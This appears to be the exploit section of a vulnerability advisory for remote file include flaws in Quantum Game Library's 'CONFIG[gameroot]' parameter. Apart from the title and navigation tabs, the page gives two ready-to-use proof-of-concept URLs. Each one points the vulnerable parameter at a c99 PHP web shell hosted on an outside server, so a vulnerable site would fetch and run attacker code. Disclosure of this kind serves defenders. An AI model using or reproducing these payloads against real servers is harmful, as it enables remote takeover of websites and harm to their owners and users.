Quantum Game Library 'CONFIG[gameroot]' Parameter Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

Quantum Game Library 'CONFIG[gameroot]' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.example.com/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=http://rxh.freehostia.com/shells/c99in.txt?